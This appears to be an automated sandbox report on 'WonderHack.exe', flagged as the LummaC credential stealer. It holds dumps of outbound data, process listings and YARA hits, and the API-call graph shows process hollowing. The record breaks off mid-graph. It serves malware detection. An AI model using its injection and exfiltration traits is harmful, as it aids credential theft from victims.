                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4 45 5d 55 51 6f fe 2e 00 62 70 73 18 71 93 2a 9f e8 1d 7a dc 93 5b 40 13 b0 97 0b 7c 39 82
                                                                                                                                                                                                                                                                        Data Ascii: `-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa |7r6;!_$E]UQo.bpsq*z[@|9
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12 fb c3 8f 5e 38 01 aa b9 46 2f f2 dd 83 ee 7a 4a 3c 39 1c 86 0c 13 c5 b9 fe 59 fb 6a 3d 20
                                                                                                                                                                                                                                                                        Data Ascii: /.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F^8F/zJ<9Yj=
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a 45 fa 93 a8 08 90 f1 f7 b9 bf 44 58 a5 18 10 78 51 1c 0f e1 a9 24 bb 20 65 c7 4f 55 82 a5
                                                                                                                                                                                                                                                                        Data Ascii: liu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iVEDXxQ$ eOU
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd b2 2f 78 03 56 d5 b3 21 70 2c 8a f2 bf 4e c8 73 72 22 ff bb 8c f4 44 07 0a 92 85 e4 00 ad
                                                                                                                                                                                                                                                                        Data Ascii: GlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-/xV!p,Nsr"D
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca 7f 7d 63 28 e4 0a 38 58 56 dd e6 cd 9e 7e 78 20 b7 a6 73 4d 87 93 57 69 a3 39 32 38 fa e5
                                                                                                                                                                                                                                                                        Data Ascii: a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5}c(8XV~x sMWi928
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2 2f 46 7e 4d d4 4e 42 13 e5 91 1d 1d 14 29 17 e2 4f 7a e1 52 dd 41 64 c0 63 c8 aa 31 5b 67
                                                                                                                                                                                                                                                                        Data Ascii: m<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}/F~MNB)OzRAdc1[g
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6 aa a3 fb 8b 31 7e 5c 25 eb 9a 12 24 26 b8 e7 c9 1a 33 09 f9 10 5c a4 fe aa 5a 6e 96 c0 b2
                                                                                                                                                                                                                                                                        Data Ascii: Z?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps61~\%$&3\Zn
                                                                                                                                                                                                                                                                        2024-12-22 23:49:29 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:28 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=16j81ge0ni8a8g3k8oov9or7qo; expires=Thu, 17 Apr 2025 17:36:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bg8fXYVtWalfsoLju%2BSA3SaUuDoONQqcAI0cFYNbgiGunm8I2lNBVCRGFeXHubLhuW3Yfee8nGx8reYKpENu7PVQ0ELOlDQKQnDDZpRcJzdmlsW2qteEPagD5rXnAvQ0Umc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6402284e075e65-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1568&rtt_var=604&sent=212&recv=616&lost=0&retrans=0&sent_bytes=2836&recv_bytes=590298&delivery_rate=1787025&cwnd=242&unsent_bytes=0&cid=b0e0e7fe4387bd49&ts=2825&x=0"


                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:18:48:00
                                                                                                                                                                                                                                                                        Start date:22/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\WonderHack.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xc90000
                                                                                                                                                                                                                                                                        File size:573'952 bytes
                                                                                                                                                                                                                                                                        MD5 hash:65FC002AB58B0DC2E95E19B1F308A354
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                        Start time:18:48:00
                                                                                                                                                                                                                                                                        Start date:22/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                        Start time:18:48:00
                                                                                                                                                                                                                                                                        Start date:22/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\WonderHack.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xc90000
                                                                                                                                                                                                                                                                        File size:573'952 bytes
                                                                                                                                                                                                                                                                        MD5 hash:65FC002AB58B0DC2E95E19B1F308A354
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2527201915.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:9.5%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:1.6%
                                                                                                                                                                                                                                                                          Signature Coverage:2.9%
                                                                                                                                                                                                                                                                          Total number of Nodes:512
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:12
                                                                                                                                                                                                                                                                          execution_graph 22337 cb86cb 44 API calls 3 library calls 22338 cb4ace 34 API calls 2 library calls 22243 c9acc0 48 API calls 22342 c9d2d0 62 API calls 22246 caf4d5 7 API calls 22247 c9b4e0 29 API calls std::_Throw_Cpp_error 22249 ca20fd 33 API calls std::_Throw_Cpp_error 22251 c930f0 31 API calls std::_Throw_Cpp_error 22347 c9aef0 125 API calls 22349 cb8ef6 29 API calls 4 library calls 22253 ca9889 47 API calls 4 library calls 22352 cb8a9d 41 API calls 3 library calls 22354 c92290 103 API calls 22356 ca2693 DeleteCriticalSection 22256 ca1c90 LCMapStringEx __Towlower 22357 caa6a3 66 API calls 22258 cb3ca7 FreeLibrary 22359 ca3eba 69 API calls codecvt 22259 ca70bb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 22260 ca6cbb GetModuleHandleW GetProcAddress GetProcAddress 22362 cb4abc GetProcessHeap 22261 ca78b1 8 API calls 22365 ca2a4c 9 API calls 3 library calls 22263 c9b440 39 API calls 22366 c97240 49 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 22367 ca1e40 20 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 22369 cb2259 55 API calls 2 library calls 22265 ca4059 70 API calls 22376 ca4665 16 API calls 22273 cb507c LeaveCriticalSection std::_Lockit::~_Lockit 22379 ca1a70 GetStringTypeW __Getwctype 22241 ca7074 21 API calls CallUnexpected 22380 ca6e74 60 API calls 2 library calls 22381 c93200 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 22274 ca1c00 6 API calls 2 library calls 22383 ca1a00 6 API calls 2 library calls 22276 ca6815 DecodePointer 22278 caa02c GetCommandLineA GetCommandLineW 22387 cafe20 36 API calls __strnicoll 22281 cbe825 49 API calls 22388 ca663d 49 API calls _unexpected 22283 ca3c33 47 API calls 2 library calls 22389 c9c230 62 API calls 22391 cb33cd 16 API calls __strnicoll 22288 ca3dd2 45 API calls 2 library calls 22397 ca9fd4 73 API calls 2 library calls 22289 cb81d4 11 API calls __Getctype 22399 c92bf0 30 API calls 22293 ca9d8f 7 API calls ___scrt_uninitialize_crt 22294 c92d80 14 API calls 22400 c95380 98 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 22295 ca1d80 21 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21640 ccf19e 21641 ccf1d4 21640->21641 21642 ccf321 GetPEB 21641->21642 21643 ccf333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21641->21643 21642->21643 21643->21641 21644 ccf3da WriteProcessMemory 21643->21644 21645 ccf41f 21644->21645 21646 ccf424 WriteProcessMemory 21645->21646 21647 ccf461 WriteProcessMemory Wow64SetThreadContext ResumeThread 21645->21647 21646->21645 22298 ca219d 78 API calls std::_Throw_Cpp_error 22086 ca2b92 22109 ca2b03 GetModuleHandleExW 22086->22109 22089 ca2bd8 22091 ca2b03 Concurrency::details::_Reschedule_chore GetModuleHandleExW 22089->22091 22093 ca2bde 22091->22093 22096 ca2bff 22093->22096 22131 ca2ae6 GetModuleHandleExW 22093->22131 22111 c9e620 22096->22111 22097 ca2bef 22097->22096 22098 ca2bf5 FreeLibraryWhenCallbackReturns 22097->22098 22098->22096 22100 ca2b03 Concurrency::details::_Reschedule_chore GetModuleHandleExW 22101 ca2c15 22100->22101 22102 ca2c43 22101->22102 22103 c9b920 47 API calls 22101->22103 22104 ca2c21 22103->22104 22105 ca5c60 ReleaseSRWLockExclusive 22104->22105 22106 ca2c34 22105->22106 22106->22102 22132 ca56ac WakeAllConditionVariable 22106->22132 22110 ca2b19 22109->22110 22110->22089 22120 c9b920 22110->22120 22112 c94f90 5 API calls 22111->22112 22113 c9e641 std::_Throw_Cpp_error 22112->22113 22133 c9f590 22113->22133 22116 c9e66f 22117 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22116->22117 22118 c9e679 22117->22118 22118->22100 22121 c9b934 std::_Throw_Cpp_error 22120->22121 22220 ca5c4f 22121->22220 22124 c9b951 22126 c9b96d 22124->22126 22224 ca2d23 40 API calls 2 library calls 22124->22224 22128 ca5c60 22126->22128 22129 ca5c7b 22128->22129 22130 ca5c6d ReleaseSRWLockExclusive 22128->22130 22129->22089 22130->22129 22131->22097 22132->22102 22134 c94f90 5 API calls 22133->22134 22135 c9f5b1 std::_Throw_Cpp_error 22134->22135 22141 ca03e0 22135->22141 22136 c9f5c3 22137 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22136->22137 22138 c9e667 22137->22138 22140 c9e6b0 CloseThreadpoolWork std::_Throw_Cpp_error 22138->22140 22140->22116 22142 ca03f7 22141->22142 22147 ca0530 22142->22147 22144 ca03fe std::_Throw_Cpp_error 22145 ca0406 22144->22145 22154 ca05f0 22144->22154 22145->22136 22159 c9d930 22147->22159 22149 ca0557 22162 c9da60 22149->22162 22152 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22153 ca05b1 22152->22153 22153->22144 22169 ca0630 22154->22169 22157 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22158 ca0620 22157->22158 22158->22145 22160 c9b920 47 API calls 22159->22160 22161 c9d94e 22160->22161 22161->22149 22165 c9b9d0 22162->22165 22166 c9b9e1 std::_Throw_Cpp_error 22165->22166 22167 ca5c60 ReleaseSRWLockExclusive 22166->22167 22168 c9b9e9 22167->22168 22168->22152 22170 ca0651 22169->22170 22179 ca0800 22170->22179 22172 ca0691 22182 ca0790 22172->22182 22176 ca06b7 22177 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22176->22177 22178 ca0613 22177->22178 22178->22157 22189 ca0940 22179->22189 22181 ca0820 22181->22172 22183 ca07b4 22182->22183 22204 ca08d0 22183->22204 22185 ca07cf 22186 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22185->22186 22187 ca06a1 22186->22187 22188 ca06d0 134 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 22187->22188 22188->22176 22190 ca0971 22189->22190 22195 ca09b0 22190->22195 22192 ca0984 22193 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22192->22193 22194 ca099b 22193->22194 22194->22181 22196 ca09c7 22195->22196 22199 ca09f0 22196->22199 22198 ca09d5 22198->22192 22200 ca0a0d 22199->22200 22202 ca0a15 Concurrency::details::_ContextCallback::_CallInContext 22200->22202 22203 ca0a40 31 API calls 2 library calls 22200->22203 22202->22198 22203->22202 22205 ca08e4 Concurrency::details::_ContextCallback::_CallInContext 22204->22205 22207 ca08ec Concurrency::details::_ContextCallback::_CallInContext 22205->22207 22213 ca2eaa RaiseException Concurrency::cancel_current_task 22205->22213 22210 ca0b60 22207->22210 22214 ca0c00 22210->22214 22217 ca0c20 22214->22217 22218 c9bdb0 Concurrency::details::_ContextCallback::_CallInContext 125 API calls 22217->22218 22219 ca0909 22218->22219 22219->22185 22225 ca5c7f GetCurrentThreadId 22220->22225 22223 ca2d23 40 API calls 2 library calls 22226 ca5cc8 22225->22226 22227 ca5ca9 22225->22227 22228 ca5ce8 22226->22228 22229 ca5cd1 22226->22229 22230 ca5cae AcquireSRWLockExclusive 22227->22230 22236 ca5cbe 22227->22236 22232 ca5d47 22228->22232 22238 ca5d00 22228->22238 22231 ca5cdc AcquireSRWLockExclusive 22229->22231 22229->22236 22230->22236 22231->22236 22234 ca5d4e TryAcquireSRWLockExclusive 22232->22234 22232->22236 22233 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22235 c9b93c 22233->22235 22234->22236 22235->22124 22235->22223 22236->22233 22238->22236 22239 ca5d37 TryAcquireSRWLockExclusive 22238->22239 22240 ca6a0d GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 22238->22240 22239->22236 22239->22238 22240->22238 22305 cb65b2 41 API calls _Fputc 22405 ca4348 72 API calls std::ios_base::_Ios_base_dtor 22307 cb6948 43 API calls 2 library calls 22308 cc194f 20 API calls 22406 c95f40 95 API calls 3 library calls 22310 ca7940 40 API calls 5 library calls 22407 cb835e 11 API calls 3 library calls 22313 caf95d 68 API calls ___scrt_uninitialize_crt 22319 ca2163 48 API calls 2 library calls 22413 ca3b64 31 API calls 22414 cb0f64 66 API calls _Fputc 22323 cc1578 43 API calls __strnicoll 22324 cb897d 42 API calls 3 library calls 22326 ca4175 68 API calls 22417 ca4f09 57 API calls 2 library calls 22418 ca9f0c 15 API calls 2 library calls 22422 c91b00 6 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 22327 cb9119 49 API calls 3 library calls 22331 ca2113 32 API calls std::_Throw_Cpp_error 22332 c9ad10 61 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 22425 cc2315 IsProcessorFeaturePresent 22428 c9d320 134 API calls 3 library calls 22429 ca7723 54 API calls 2 library calls 22432 ca6f27 30 API calls 21648 ca6f39 21649 ca6f45 ___scrt_is_nonwritable_in_current_image 21648->21649 21674 ca24ec 21649->21674 21651 ca6f4c 21652 ca70a5 21651->21652 21662 ca6f76 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 21651->21662 21707 ca6528 4 API calls 2 library calls 21652->21707 21654 ca70ac 21655 ca70b2 21654->21655 21700 cac9bd 21654->21700 21708 cac9d3 21 API calls CallUnexpected 21655->21708 21658 ca70ba 21659 ca6f95 21660 ca7016 21685 caef3c 21660->21685 21662->21659 21662->21660 21703 caca07 39 API calls 4 library calls 21662->21703 21664 ca701c 21689 c91c20 21664->21689 21668 ca703d 21668->21654 21669 ca7041 21668->21669 21670 ca704a 21669->21670 21705 cac9e9 21 API calls CallUnexpected 21669->21705 21706 ca2525 75 API calls ___scrt_uninitialize_crt 21670->21706 21673 ca7053 21673->21659 21675 ca24f5 21674->21675 21709 ca6194 IsProcessorFeaturePresent 21675->21709 21677 ca2501 21710 ca78c5 10 API calls 2 library calls 21677->21710 21679 ca2506 21684 ca250a 21679->21684 21711 ca9dff 21679->21711 21682 ca2521 21682->21651 21684->21651 21686 caef4a 21685->21686 21687 caef45 21685->21687 21686->21664 21724 caf065 57 API calls 21687->21724 21725 c92460 21689->21725 21697 c91c85 21749 ca2303 21697->21749 21699 c91ca4 21704 ca64d5 GetModuleHandleW 21699->21704 22017 cacb08 21700->22017 21703->21660 21704->21668 21705->21670 21706->21673 21707->21654 21708->21658 21709->21677 21710->21679 21715 cb54a5 21711->21715 21714 ca78e4 7 API calls 2 library calls 21714->21684 21716 cb54b5 21715->21716 21717 ca2513 21715->21717 21716->21717 21719 cb4c19 21716->21719 21717->21682 21717->21714 21720 cb4c20 21719->21720 21721 cb4c63 GetStdHandle 21720->21721 21722 cb4cc5 21720->21722 21723 cb4c76 GetFileType 21720->21723 21721->21720 21722->21716 21723->21720 21724->21686 21726 c9248c 21725->21726 21756 c9a920 21726->21756 21729 c924b0 21731 c924e0 21729->21731 21824 c947f0 21731->21824 21735 c925a4 21831 c94b70 21735->21831 21736 c92806 21738 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21736->21738 21737 c9265d 21744 c926c2 21737->21744 21828 ca14f0 21737->21828 21740 c91c6a 